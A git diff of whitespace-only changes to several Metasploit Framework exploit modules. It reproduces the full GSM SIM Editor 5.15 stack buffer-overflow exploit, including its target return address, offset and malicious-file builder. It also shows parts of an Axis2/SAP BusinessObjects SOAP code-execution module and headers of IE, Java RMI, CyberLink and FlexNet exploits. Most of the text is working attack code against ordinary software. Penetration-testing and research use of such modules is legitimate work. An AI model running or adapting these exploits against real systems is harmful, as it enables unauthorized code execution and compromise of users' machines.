diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
index 3cf35f8da3..6f7cb3df03 100644
--- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb
+++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
return [nil, nil] if not (res and res.headers['Set-Cookie'])
-
+
# Get the session ID from the cookie
m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
id = (m.nil?) ? nil : m[1]
diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb
index 9c751d5e66..889642fce5 100644
--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -8,13 +8,13 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
+ Rank = ExcellentRanking
- HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
+ HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
- include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
+ def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)',
'Description' => %q{
@@ -23,18 +23,18 @@ class Metasploit3 < Msf::Exploit::Remote
},
'References' =>
[
- # General
- [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
- [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
- [ 'CVE', '2010-0219' ],
+ # General
+ [ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
+ [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
+ [ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
- 'Platform' => 'java'
- },
+ 'Platform' => 'java'
+ },
],
#
# Platform specific targets only
@@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote
+ mep="http://www.w3.org/2004/08/wsdl/in-only"
+ class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
+ mep="http://www.w3.org/2004/08/wsdl/in-out"
+ class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
- metasploit.PayloadServlet
+ metasploit.PayloadServlet
}
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
- end
+ end
boundary = rand_text_alphanumeric(6)
@@ -134,27 +134,27 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
=begin
- res = send_request_raw({
- 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
- 'method' => 'GET',
- 'headers' =>
- {
- 'Cookie' => "JSESSIONID=#{session}",
- }
- }, 25)
- puts res.body
- puts res.code
- if res.code > 200 and res.code < 300
- if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
- dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
- puts dir
- else
- if ( a.scan(/catalina\.home<\/th>| (.*) <\/td>/i) )
- dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
- puts dir
- end
- end
- end
+ res = send_request_raw({
+ 'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
+ 'method' => 'GET',
+ 'headers' =>
+ {
+ 'Cookie' => "JSESSIONID=#{session}",
+ }
+ }, 25)
+ puts res.body
+ puts res.code
+ if res.code > 200 and res.code < 300
+ if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
+ dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
+ puts dir
+ else
+ if ( a.scan(/catalina\.home<\/th> | (.*) <\/td>/i) )
+ dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
+ puts dir
+ end
+ end
+ end
=end
print_status("Polling to see if the service is ready")
@@ -241,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})")
end
- end
+ end
def cleanup_instructions(rpath, name)
print_line("")
@@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_line("")
end
- def exploit
+ def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
rpath = datastore['PATH']
@@ -345,4 +345,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb
index 85ca51e297..b36472cddb 100644
--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
# RMI protocol specification
[ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
# Placeholder reference for matching
- [ 'MSF', 'java_rmi_server']
+ [ 'MSF', 'java_rmi_server']
],
'DisclosureDate' => 'Oct 15 2011',
'Platform' => ['java', 'win', 'osx', 'linux', 'solaris'],
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0
))
register_options( [ Opt::RPORT(1099) ], self.class)
-
+
register_autofilter_ports([ 1098, 1099 ])
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
end
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Not exploitable: the RMI class loader is disabled")
return
end
-
+
print_good("Target #{rhost}:#{rport} may be exploitable...")
# Wait for the request to be handled
diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb
index d51b39a25f..b319706025 100644
--- a/modules/exploits/windows/browser/ms10_002_ie_object.rb
+++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "MS10-002 Internet Explorer Object Memory Use-After-Free",
'Description' => %q{
This module exploits a vulnerability found in Internet Explorer's
- mshtml component. Due to the way IE handles objects in memory, it is
+ mshtml component. Due to the way IE handles objects in memory, it is
possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext
to be used even after it gets freed, therefore allowing remote code
execution under the context of the user.
diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
index 1b690baa74..e20f435c92 100644
--- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
+++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def get_payload(hunter)
-
+
[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
enc = framework.encoders.create(name)
if name =~ /unicode/
diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb
index a70f4c4ca6..d376bc8213 100644
--- a/modules/exploits/windows/fileformat/gsm_sim.rb
+++ b/modules/exploits/windows/fileformat/gsm_sim.rb
@@ -1,75 +1,75 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
-
- include Msf::Exploit::FILEFORMAT
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',
- 'Description' => %q{
- This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.
- When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer
- overflow occurs which allows an attacker to execute arbitrary code.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Ruben Alejandro',
- 'chap0 ',
- 'Lincoln '
- ],
- 'References' =>
- [
- [ 'EDB', '14258' ]
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'process',
- },
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'Space' => 2000,
- 'BadChars' => "\x00",
- 'DisableNops' => true,
- 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500
- },
- 'Targets' =>
- [
- [ 'Windows XP SP3',
- {
- 'Ret' => 0x00405201, # call esp - SIMEditor.exe
- 'Offset' => 810
- }
- ]
- ],
- 'Privileged' => false,
- 'DisclosureDate' => 'Jul 07 2010',
- 'DefaultTarget' => 0))
-
- register_options(
- [
- OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),
- ], self.class)
-
- end
-
- def exploit
- buffer = rand_text_numeric(target['Offset'])
- buffer << [target.ret].pack('V').unpack("H*")[0]
- buffer << make_nops(30).unpack("H*")[0]
- buffer << payload.encoded.unpack("H*")[0]
-
- file_create(buffer)
- end
-
-end
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.
+ When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer
+ overflow occurs which allows an attacker to execute arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Ruben Alejandro',
+ 'chap0 ',
+ 'Lincoln '
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '14258' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'Space' => 2000,
+ 'BadChars' => "\x00",
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500
+ },
+ 'Targets' =>
+ [
+ [ 'Windows XP SP3',
+ {
+ 'Ret' => 0x00405201, # call esp - SIMEditor.exe
+ 'Offset' => 810
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Jul 07 2010',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),
+ ], self.class)
+
+ end
+
+ def exploit
+ buffer = rand_text_numeric(target['Offset'])
+ buffer << [target.ret].pack('V').unpack("H*")[0]
+ buffer << make_nops(30).unpack("H*")[0]
+ buffer << payload.encoded.unpack("H*")[0]
+
+ file_create(buffer)
+ end
+
+end
diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
index 599e325abc..dc69d352eb 100644
--- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
+++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '52718' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ],
[ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],
- [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
+ [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
],
'Privileged' => true,
'DefaultOptions' =>
|